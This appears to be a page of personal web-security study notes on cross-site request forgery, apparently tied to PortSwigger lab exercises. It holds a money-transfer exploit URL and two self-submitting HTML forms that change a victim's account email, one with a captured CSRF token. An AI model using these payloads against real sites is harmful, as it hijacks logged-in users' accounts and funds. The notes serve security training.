CSRF

Cross Site Request Forgery

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions in a web application wherein they're currently authenticated.

GET scenario

If the application was designed to use GET requests to execute actions like making bank transfers or sending messages, the executing action might be reduced to a request as shown below: 

// code
GET http://application.com/action.do?account=Victim&amount=100 HTTP/1.1

An attacker now decides to exploit this web application vulnerability. The attacker first constructs the following exploit URL, which will transfer $10,000 from the victim's account to their own.

// attacker mod
http://application.com/action.do?account=Attacker&amount=10000

The social engineering aspect of the attack tricks the victim into loading this URL while logged into the banking application. This is usually done with one of the following techniques:

  • sending an unsolicited email with HTML content

  • planting an exploit URL or script on pages the victim is likely to visit while banking online

POST scenario

The only difference between GET and POST attacks is how the attack is being executed by the victim. Let's assume the bank now uses POST and the vulnerable request looks like this:

// POST http://application.com/action.do HTTP/1.1
account=Victim&amount=10

// Some code
<html>
    <body>
        <form method="POST" action="https://0a21005f04e3e13cc0c7412d00d500d4.web-security-academy.net/my-account/change-email">
            <input type="hidden" name="email" value="wiener7777@normail-user.net">
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>

HEAD:
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Host: 0a21005f04e3e13cc0c7412d00d500d4.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

/exploit

// make sure to get the latest csrf token
<html>
<body>
<form action="https://0abf00800449863bc07f4845000c0092.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="janitor@google.com"/>
<input type="hidden" name="csrf" value="KfmpZD96CXIjxlnsed0VzUsQGqxpnIzl"/>
<input type="submit" value="Submit request"/>
</form>
<script>
 document.forms[0].submit();
</script>
</body>
</html>

PreviouseWPTNextsqli

Last updated

Was this helpful?